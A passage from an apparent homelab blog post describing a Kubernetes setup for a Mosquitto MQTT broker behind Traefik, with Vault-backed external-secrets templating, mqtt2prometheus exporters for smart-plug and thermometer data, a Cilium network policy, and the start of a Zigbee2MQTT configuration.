<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">IngressRouteTCP</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mosquitto-tls</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">websecure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">routes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">match</span>: <span style="color:#ae81ff">HostSNI(`{{ .Values.mqttHost }}`)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mosquitto</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">port</span>: <span style="color:#ae81ff">1883</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tls</span>: {}
</span></span></code></pre></div><p>Here, the <code>websecure</code> entrypoint is my standard HTTPS entrypoint. This still works
as expected, even for pure TLS connections: Traefik uses the SNI to forward
connections arriving for mqtt.example.com to mosquitto.
The <code>tls</code> key at the end is important, even though it is empty. It tells
Traefik to enable TLS with its default configuration, which uses my wildcard
cert.</p>
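<p>To check that this works, any MQTT client that speaks TLS can simply connect to port
443. A quick test with mosquitto_sub could look like this (user, password and topic are
placeholders):</p>
<pre tabindex="0"><code>mosquitto_sub -h mqtt.example.com -p 443 --capath /etc/ssl/certs -u someuser -P somepassword -t &#39;zigbee2mqtt/#&#39; -v
</code></pre>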
<p>The most interesting part of the mosquitto setup was the creation of users.
It uses a passwd-like file format, and I got &ldquo;creative&rdquo; when setting up the
Nomad job.
All of the users (admin user, scrapers, Zigbee2MQTT, my smart plugs) are in a
directory in Vault, looking like this:</p>
<pre tabindex="0"><code>my-secrets/iot/mqtt/users/username1
my-secrets/iot/mqtt/users/username2
[...]
</code></pre><p>Then each of those only has a single key, <code>secret</code>, which contains the user&rsquo;s
password, already hashed with <a href="https://mosquitto.org/man/mosquitto_passwd-1.html">mosquitto_passwd</a>.
The problem now is: how do I get all of those into a single passwd file for
mosquitto to use?
The resulting file should look something like this:</p>
<pre tabindex="0"><code>user1:$7$foo_encrypted==

user2:$7$bar_encrypted==
</code></pre><p>It turns out that <a href="https://external-secrets.io/latest/">external-secrets</a> has a
pretty good <a href="https://external-secrets.io/latest/guides/templating/">templating engine</a>,
so I was actually able to do this. The finished ExternalSecret looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mosquitto-users</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1m&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-secrets</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">passwd</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">passwd</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          {{ `{{ range $name, $pass := . }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          {{ $name }}:{{ with $pass | fromJson }}{{ .secret }}{{ end }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          {{ end }}` }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dataFrom</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">find</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">my-secrets/iot/mqtt/users</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#34;.*&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">rewrite</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">regexp</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">source</span>: <span style="color:#e6db74">&#34;my-secrets/iot/mqtt/users/(.*)&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">target</span>: <span style="color:#e6db74">&#34;$1&#34;</span>
</span></span></code></pre></div><p>Let&rsquo;s start with the data fetching in <code>dataFrom</code>. It finds all secrets
below the <code>users/</code> path and returns them in a map, akin to this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">resultMap</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">my-secrets/iot/mqtt/users/username1</span>: {<span style="color:#f92672">&#34;secret&#34;: </span><span style="color:#e6db74">&#34;foo&#34;</span>}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">my-secrets/iot/mqtt/users/username2</span>: {<span style="color:#f92672">&#34;secret&#34;: </span><span style="color:#e6db74">&#34;bar&#34;</span>}
</span></span></code></pre></div><p>This is a bit unfortunate, because for the right file format I need just the
username, not the full path. That&rsquo;s what the <code>rewrite:</code> object gives me. It does a regex match on
the whole path and gives me back only the last element, which is the username.
The template itself then just iterates over the map and writes out the
username and password in the right format.</p>
<p>I&rsquo;m repeatedly impressed by how many tight situations external-secrets has already
helped me out of. After some fiddling, this is a good enough result.</p>
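<p>For completeness, the hashes stored in Vault can be generated with mosquitto_passwd
and then copied into the per-user secret. A sketch, assuming a throwaway file and a KV
mount reachable under <code>my-secrets</code>:</p>
<pre tabindex="0"><code># create a scratch passwd file with one hashed entry (batch mode)
mosquitto_passwd -c -b /tmp/pw username1 &#39;the-actual-password&#39;

# store only the hash part (everything after the colon) in Vault
vault kv put my-secrets/iot/mqtt/users/username1 secret=&#34;$(cut -d: -f2- /tmp/pw)&#34;
</code></pre>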
<p>One thing I found rather unfortunate though: there&rsquo;s no way of defining the
owner of a Secret mapped into a pod as a volume. This means that the passwd file
sits in the container world-readable. Not great. The only potential solution I
found was the introduction of an init container to run chmod on the file.
I skipped that for now, but will have to take care of it at some point,
because mosquitto already complains that the passwd file is
world-readable, noting that such a setup will be rejected in the future.</p>
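<p>If I do tackle it, the fix would probably look something like the following: an init
container copies the file from the read-only Secret mount into an emptyDir shared with
the mosquitto container, and fixes owner and mode there. Just a sketch - the UID is a
placeholder for whatever user the mosquitto container actually runs as:</p>
<pre tabindex="0"><code>initContainers:
  - name: fix-passwd-perms
    image: alpine:3.21.2
    # copy the passwd file out of the Secret volume and restrict it to the mosquitto user
    command: [&#34;sh&#34;, &#34;-c&#34;, &#34;cp /secret/passwd /writable/passwd &amp;&amp; chown 1883 /writable/passwd &amp;&amp; chmod 0400 /writable/passwd&#34;]
    volumeMounts:
      - name: passwd-secret     # the Secret volume
        mountPath: /secret
      - name: passwd-writable   # an emptyDir also mounted by the mosquitto container
        mountPath: /writable
</code></pre>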
<h2 id="scraping-mqtt-data-with-prometheus">Scraping MQTT data with Prometheus</h2>
<p>I greatly enjoy my Prometheus data and like looking at all of the plots
in Grafana. There&rsquo;s a reason it gets to occupy 200 GB of disk space.
So I need to get my MQTT data, meaning power consumption from the smart plugs
and thermal data from the thermometers, into Prometheus.
For this, I&rsquo;m using <a href="https://github.com/hikhvar/mqtt2prometheus">mqtt2prometheus</a>.
I&rsquo;ve currently got two instances running, one for my power plugs&rsquo; energy measurement
and one for my thermometers&rsquo; temperature and humidity. I put both of them into
one Pod, because having separate Pods for each of them seemed unnecessary.</p>
<p>The configuration of the power measurements exporter looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pwr-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">config.yaml</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    mqtt:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      server: tcp://{{ .Values.mqttHost }}:{{ .Values.ports.mosquitto }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      user: promexport
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      client_id: pwr-exporter
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      topic_path: &#34;plugs/tasmota/tele/#&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      device_id_regex: &#34;plugs/tasmota/tele/(?P&lt;deviceid&gt;.*)/.*&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    metrics:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_total_power_kwh
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: ENERGY.Total
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Total power consumption (kWh)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: counter
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_power
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: ENERGY.Power
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Current consumption (W)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: gauge
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_current
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: ENERGY.ApparentPower
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Current (A)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: gauge
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_yesterday_pwr
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: ENERGY.Yesterday
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Yesterdays Total Power Consumption (kWh)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: counter
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_today_pwr
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: ENERGY.Today
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Todays Total Power Consumption (kWh)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: counter</span>
</span></span></code></pre></div><p>And the one for the thermometers looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">temp-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">config.yaml</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    mqtt:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      server: tcp://{{ .Values.mqttHost }}:{{ .Values.ports.mosquitto }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      user: promexport
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      client_id: temp-exporter
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      topic_path: &#34;zigbee2mqtt/temp/sonoff/#&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      device_id_regex: &#34;zigbee2mqtt/temp/sonoff/(?P&lt;deviceid&gt;.*)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    cache:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      timeout: 24h
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    metrics:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_temp_battery_percent
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: battery
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Current battery percentage (percent)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: gauge
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        omit_timestamp: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_temp_humidity
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: humidity
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Current humidity (percent)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: gauge
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        omit_timestamp: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - prom_name: mqtt_temp_temperature
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mqtt_name: temperature
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        help: &#34;Current temperature (C)&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        type: gauge
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        omit_timestamp: true</span>
</span></span></code></pre></div><p>The configurations mostly consist of translating fields from the MQTT messages
into Prometheus metrics.</p>
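<p>To make that a bit more concrete: the Tasmota plugs publish their telemetry as JSON
on topics like <code>plugs/tasmota/tele/&lt;device&gt;/SENSOR</code>, and the <code>mqtt_name</code>
entries above are just paths into that payload. Roughly (values made up):</p>
<pre tabindex="0"><code>{
  &#34;Time&#34;: &#34;2025-02-15T12:00:00&#34;,
  &#34;ENERGY&#34;: {
    &#34;Total&#34;: 123.456,
    &#34;Yesterday&#34;: 0.512,
    &#34;Today&#34;: 0.204,
    &#34;Power&#34;: 42,
    &#34;ApparentPower&#34;: 45,
    &#34;Current&#34;: 0.190
  }
}
</code></pre>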
<p>Here&rsquo;s the deployment for the Pod:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">exporters</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">exporters</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">exporters</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/pwr-config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/pwr-exp-conf.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/temp-config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/temp-exp-conf.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pwr-exporter</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">ghcr.io/hikhvar/mqtt2prometheus:{{ .Values.mqtt2promVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-config&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;/etc/mqtt2prom/config.yaml&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-listen-port&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;{{ .Values.ports.pwr }}&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-log-format&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;json&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config-pwr</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/mqtt2prom</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">MQTT2PROM_MQTT_USER</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;promexport&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">envFrom</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">exporter-mosquitto-user</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">optional</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pwr-exporter</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.pwr }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">temp-exporter</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">ghcr.io/hikhvar/mqtt2prometheus:{{ .Values.mqtt2promVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-config&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;/etc/mqtt2prom/config.yaml&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-listen-port&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;{{ .Values.ports.temp }}&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-log-format&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;json&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config-temp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/mqtt2prom</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">MQTT2PROM_MQTT_USER</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;promexport&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">envFrom</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">exporter-mosquitto-user</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">optional</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">temp-exporter</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.temp }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config-pwr</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pwr-exporter</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config-temp</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">temp-exporter</span>
</span></span></code></pre></div><p>I have again cut out some unimportant pieces. Luckily, mqtt2prometheus supports
providing the credentials for MQTT access via environment variables, so I didn&rsquo;t
have to template the entire configuration file to avoid putting the credentials
into git.</p>
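<p>The <code>exporter-mosquitto-user</code> Secret referenced in <code>envFrom</code> only needs to
carry the password variable, presumably <code>MQTT2PROM_MQTT_PASSWORD</code> as the counterpart
to the user variable set above. As an ExternalSecret it could look roughly like this - the
Vault path is a placeholder:</p>
<pre tabindex="0"><code>apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata:
  name: exporter-mosquitto-user
spec:
  refreshInterval: &#34;1m&#34;
  secretStoreRef:
    name: my-secrets
    kind: ClusterSecretStore
  target:
    name: exporter-mosquitto-user
  data:
    - secretKey: MQTT2PROM_MQTT_PASSWORD
      remoteRef:
        key: my-secrets/iot/mqtt/client-passwords/promexport  # placeholder path
        property: secret
</code></pre>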
<p>Finally, I also had to set up a network policy to allow my Prometheus deployment
access to the Pod and its ports for scraping:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;exporters&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">exporters</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">monitoring</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">prometheus</span>
</span></span></code></pre></div><h2 id="the-zigbee-manager">The Zigbee manager</h2>
<p>My thermometers are connected via Zigbee, so I needed some way to transform the
data to MQTT and send it to my mosquitto instance. I don&rsquo;t use HomeAssistant,
because it looks very much like overkill - I don&rsquo;t actually control anything,
I just want to gather a bit of data.
I&rsquo;m using <a href="https://www.zigbee2mqtt.io/">Zigbee2MQTT</a> for this, with a
Zigbee transceiver connected via LAN, so I didn&rsquo;t have to muck about with
mounting a USB device into the Pod.
Again, Zigbee2MQTT is a good piece of software, because it allows me to set the
config keys containing secrets via environment variables, while still letting me
provide the non-secret config options in the configuration file.
Zigbee2MQTT requires three secrets:</p>
<ol>
<li>The MQTT credentials for access to mosquitto</li>
<li>An auth token for access to the web UI</li>
<li>A network key</li>
</ol>
<p>I&rsquo;m providing all three from my Vault instance in an ExternalSecret again:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1m&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-secrets</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">zigbee2mqtt</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">data</span>:
